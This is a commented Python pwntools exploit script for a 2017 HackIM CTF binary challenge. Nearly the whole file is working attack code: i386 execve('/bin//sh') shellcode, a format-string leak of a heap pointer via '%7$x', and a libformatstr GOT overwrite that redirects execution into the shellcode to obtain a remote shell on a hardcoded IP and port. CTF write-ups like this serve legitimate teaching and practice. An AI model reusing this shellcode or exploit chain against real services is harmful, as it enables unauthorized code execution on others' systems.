Tags: #exploit #pwn 


from pwn import *
from libformatstr import *

#Exploit the daemon at 34.198.96.6:9001
#Exploitation Question 1 : 200 pts
#HACKIM CTF2017
#exploit by : Abdeljalil Nouiri

# Target from the challenge text (L8); it was the CTF box in 2017 and is
# presumably gone.  Swap the two lines below to run against a local copy
# of the binary instead.  Note this connects at import time, so every
# function further down assumes `con` is already live.
HOST, PORT = "34.198.96.6", 9001
con = remote(HOST, PORT)
#con = process("./level1.bin")

# 24-byte i386 Linux execve("/bin//sh", NULL, NULL); the comments are a
# straight decode of the opcode bytes.  It contains no 0x00 and no 0x0a
# byte, which matters because ADD_book() delivers it with sendline() (a
# newline inside it would end the line early on a line-oriented read).
shellcode = (
    "\x6a\x0b"              # push 0xb
    "\x58"                  # pop eax          ; eax = 11 (SYS_execve)
    "\x31\xf6"              # xor esi, esi
    "\x56"                  # push esi         ; NUL terminator for the path
    "\x68\x2f\x2f\x73\x68"  # push "//sh"
    "\x68\x2f\x62\x69\x6e"  # push "/bin"
    "\x89\xe3"              # mov ebx, esp     ; ebx -> "/bin//sh"
    "\x31\xc9"              # xor ecx, ecx     ; argv = NULL
    "\x89\xca"              # mov edx, ecx     ; envp = NULL
    "\xcd\x80"              # int 0x80
)
def ADD_book():
    """Menu option 1: create a book whose content is the raw shellcode.

    Sequence sent to the daemon: "1" (menu choice), the shellcode bytes
    (first prompt), then "1" again (second prompt -- what that field is,
    a size or a flag, is not visible here; it is what the original
    exploit sends).  Each ``recv()`` only drains whatever the prompt
    already produced and does not wait for a specific string, so a slow
    server can desynchronise the menu; use recvuntil() on the real prompt
    text if that happens.  Uses the module-level ``con`` and ``shellcode``.
    """
    for answer in ("1", shellcode):
        con.sendline(answer)
        con.recv()          # drain the prompt that follows each answer
    con.sendline("1")

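def Leak_heap_Nsend(GOT):
    """Leak a pointer through the format-string bug, then write it into ``GOT``.

    Step 1: menu option 3 evaluates our input as a printf format string
    (that is the bug), so "%7$x" prints the 7th stack argument.  The
    original writeup labels that value the heap address -- presumably the
    book created by ADD_book(), i.e. where the shellcode lives; confirm
    against the binary if this ever stops working.
    Step 2: use libformatstr to build a write of that value to ``GOT``
    (``payload(11, 0)``: our input starts at printf argument 11, no
    padding) and send it through option 3 again, so that the next call
    made through that GOT slot is meant to land in the shellcode.

    GOT: address of the GOT entry to overwrite (e.g. ``ptcGOT``).
    Leaves the connection in interactive mode.  Raises ValueError if the
    leaked text is not hex, instead of writing garbage into the GOT.
    """
    marker = "@@"

    con.recv()
    con.sendline("3")
    con.recv()
    # Bracket the leak with a marker so it can be located regardless of
    # how much banner/menu text the daemon prints around it.  The original
    # relied on a fixed [16:-74] slice of a single recv(), which silently
    # misparses the moment the surrounding text changes or recv() returns
    # a partial read.
    con.sendline(marker + "%7$x" + marker)
    con.recvuntil(marker)
    leaked = con.recvuntil(marker, drop=True).strip()
    calc = int(leaked, 16)      # int(..., 16) already accepts an optional 0x prefix
    # Drain whatever the daemon prints after the leak (menu text) so the
    # next recv() waits for the fresh prompt, as it did in the original.
    con.recv(timeout=1)

    pay = FormatStr(50)
    pay[GOT] = calc
    log.info("Heap address : " + hex(calc))
    load = pay.payload(11, 0)
    con.sendline("3")
    con.recv()
    con.send(load)              # send(), not sendline(): the payload's length/padding is exact
    con.interactive()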

# GOT entry that Leak_heap_Nsend() overwrites with the leaked pointer.
# "ptc" is the writeup's name for it (presumably putchar -- TODO confirm
# against the binary's GOT).  Addresses are fixed: 32-bit, non-PIE binary.
ptcGOT = 0x0804b038
# Alternative target noted in the original writeup; unused by this script.
#puts = 0x0804b02c

def main():
    """Run the two stages: plant the shellcode, then leak + GOT overwrite."""
    ADD_book()
    Leak_heap_Nsend(ptcGOT)


main()

Original writeup (https://gist.github.com/Littlepwny/cfce90684a43390edcc6cc674fdc64d2).